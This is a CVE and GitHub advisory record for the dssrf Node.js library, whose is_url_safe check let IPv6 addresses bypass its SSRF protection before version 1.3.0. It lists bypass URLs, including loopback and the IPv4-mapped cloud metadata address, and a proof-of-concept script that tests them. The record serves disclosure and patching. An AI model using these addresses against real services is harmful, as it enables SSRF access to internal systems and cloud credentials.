← Back
2026-05-12 20:28CVE-2026-44232GitHub_M
PUBLISHED5.2CWE-791

dssrf: every IPv6 category bypasses is_url_safe

DSSRF is a Node.js library that provides a wide range of utilities and advanced SSRF defense checks. Prior to 1.3.0, every IPv6 category bypasses is_url_safe. This vulnerability is fixed in 1.3.0.

Problem type

Affected products

HackingRepo

dssrf-js

< 1.3.0 - AFFECTED

References

https://github.com/HackingRepo/dssrf-js/security/advisories/GHSA-8p33-q827-ghj5

https://github.com/HackingRepo/dssrf-js/security/advisories/GHSA-8p33-q827-ghj5

x_refsource_CONFIRM

GitHub Security Advisories

GHSA-8p33-q827-ghj5

dssrf: every IPv6 category bypasses is_url_safe

https://github.com/advisories/GHSA-8p33-q827-ghj5

A vulnerability in dssrf allows an attacker to bypass its SSRF protections by supplying one of the following IPv6 addresses, resulting in a successful SSRF. This contradicts dssrf documentation, which incorrectly claims that IPv6 is disabled entirely. See below:

Input	Category
http://[::1]/	IPv6 loopback
http://[fc00::1]/	IPv6 ULA
http://[fe80::1]/	IPv6 link-local
http://[::ffff:127.0.0.1]/	IPv4-mapped loopback
http://[::ffff:169.254.169.254]/	IPv4-mapped IMDS
http://[::ffff:100.64.0.1]/	IPv4-mapped CGNAT
http://[64:ff9b::7f00:1]/	NAT64 well-known prefix
http://[64:ff9b:1::1]/	NAT64 local-use (RFC 8215)
http://[5f00::1]/	SRv6 SID (RFC 9602)
http://[3fff::1]/	IPv6 documentation (RFC 9637)
http://[fec0::1]/	IPv6 site-local (deprecated, RFC 3879)
http://[::127.0.0.1]/	IPv4-compatible IPv6

POC

mkdir dssrf-poc && cd dssrf-poc
npm init -y >/dev/null
npm install dssrf@^1.0.2
cat > audit.js <<'EOF'
const dssrf = require('dssrf');
const cases = [
  ['http://[::1]/',                         'IPv6 loopback'],
  ['http://[fc00::1]/',                     'IPv6 ULA'],
  ['http://[fe80::1]/',                     'IPv6 link-local'],
  ['http://[::ffff:127.0.0.1]/',            'IPv4-mapped loopback'],
  ['http://[::ffff:169.254.169.254]/',      'IPv4-mapped IMDS'],
  ['http://[64:ff9b::7f00:1]/',             'NAT64 well-known + 127.0.0.1'],
  ['http://[64:ff9b:1::1]/',                'NAT64 local-use (RFC 8215)'],
  ['http://[5f00::1]/',                     'SRv6 SID (RFC 9602)'],
  ['http://[fec0::1]/',                     'IPv6 site-local deprecated'],
  ['http://127.0.0.1/',                     'IPv4 loopback (control)'],
  ['http://10.0.0.1/',                      'IPv4 RFC1918 (control)'],
  ['http://8.8.8.8/',                       'PUBLIC IPv4 (control)'],
];
(async () => {
  for (const [url, label] of cases) {
    const safe = await dssrf.is_url_safe(url);
    console.log(`${safe ? '✓ALLOW' : '·block'}  ${url.padEnd(40)}  ${label}`);
  }
})();
EOF
node audit.js

Credit

dssrf thanks brmenna@gmail.com for reporting this issue responsibly.

Update

Users should immediately update to dssrf 1.3.0.

Lessons Learned

As seen both in the past and today, many advisories and CVE bypasses leverage IPv6. IPv6 remains the weakest link, as it is rarely configured correctly and seldom tested. In this case, while IPv4 was properly blocked, the corresponding IPv6 blocking logic was completely broken and never actually worked.,

github.com

https://github.com/HackingRepo/dssrf-js/security/advisories/GHSA-8p33-q827-ghj5

github.com

https://github.com/advisories/GHSA-8p33-q827-ghj5

JSON source

https://cveawg.mitre.org/api/cve/CVE-2026-44232
Click to expand
{
  "dataType": "CVE_RECORD",
  "dataVersion": "5.2",
  "cveMetadata": {
    "cveId": "CVE-2026-44232",
    "assignerOrgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
    "assignerShortName": "GitHub_M",
    "dateUpdated": "2026-05-12T20:28:56.918Z",
    "dateReserved": "2026-05-05T15:42:40.518Z",
    "datePublished": "2026-05-12T20:28:56.918Z",
    "state": "PUBLISHED"
  },
  "containers": {
    "cna": {
      "providerMetadata": {
        "orgId": "a0819718-46f1-4df5-94e2-005712e83aaa",
        "shortName": "GitHub_M",
        "dateUpdated": "2026-05-12T20:28:56.918Z"
      },
      "title": "dssrf: every IPv6 category bypasses is_url_safe",
      "descriptions": [
        {
          "lang": "en",
          "value": "DSSRF is a Node.js library that provides a wide range of utilities and advanced SSRF defense checks. Prior to 1.3.0, every IPv6 category bypasses is_url_safe. This vulnerability is fixed in 1.3.0."
        }
      ],
      "affected": [
        {
          "vendor": "HackingRepo",
          "product": "dssrf-js",
          "versions": [
            {
              "version": "< 1.3.0",
              "status": "affected"
            }
          ]
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "lang": "en",
              "description": "CWE-791: Incomplete Filtering of Special Elements",
              "cweId": "CWE-791",
              "type": "CWE"
            }
          ]
        }
      ],
      "references": [
        {
          "url": "https://github.com/HackingRepo/dssrf-js/security/advisories/GHSA-8p33-q827-ghj5",
          "name": "https://github.com/HackingRepo/dssrf-js/security/advisories/GHSA-8p33-q827-ghj5",
          "tags": [
            "x_refsource_CONFIRM"
          ]
        }
      ],
      "metrics": [
        {}
      ]
    }
  }
}